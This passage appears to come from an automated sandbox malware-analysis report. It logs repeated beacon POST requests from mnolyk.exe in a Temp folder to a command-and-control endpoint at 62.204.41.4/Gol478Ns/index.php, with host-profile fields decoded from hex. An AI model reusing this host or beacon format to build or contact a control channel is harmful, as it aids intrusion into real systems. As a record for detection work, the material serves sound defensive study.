                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:15.539522886 CET521INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        321192.168.2.55001162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:15.710647106 CET522OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:15.775943995 CET522INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        322192.168.2.55001262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:15.955152988 CET523OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:16.023773909 CET523INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        323192.168.2.55001362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:16.193100929 CET524OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:16.259099960 CET524INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        324192.168.2.55001462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:16.436543941 CET525OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:16.505187035 CET525INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        325192.168.2.55001562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:16.703906059 CET526OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:16.769123077 CET526INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        326192.168.2.55001662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:16.944190979 CET527OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:17.008083105 CET527INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        327192.168.2.55001762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:17.179297924 CET528OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:17.245771885 CET528INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        328192.168.2.55001862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:17.421895981 CET529OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:17.487003088 CET529INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        329192.168.2.55001962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:17.663562059 CET530OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:17.728158951 CET530INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        33192.168.2.54972362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:39.562180042 CET233OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:39.626537085 CET234INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        330192.168.2.55002062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:17.901531935 CET531OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:17.965811014 CET531INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        331192.168.2.55002162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:18.134392977 CET532OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:18.199697971 CET532INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        332192.168.2.55002262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:18.367475033 CET533OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:18.430800915 CET533INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        333192.168.2.55002362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:18.602365017 CET534OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:18.666377068 CET534INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        334192.168.2.55002462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:18.856589079 CET535OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:18.919759035 CET535INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        335192.168.2.55002562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:19.101445913 CET536OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:19.167455912 CET536INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        336192.168.2.55002662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:19.334486961 CET537OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:19.397778034 CET537INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        337192.168.2.55002762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:19.567096949 CET538OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:19.630285025 CET538INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        338192.168.2.55002862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:19.806368113 CET539OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:19.871136904 CET539INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        339192.168.2.55002962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:20.040672064 CET540OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
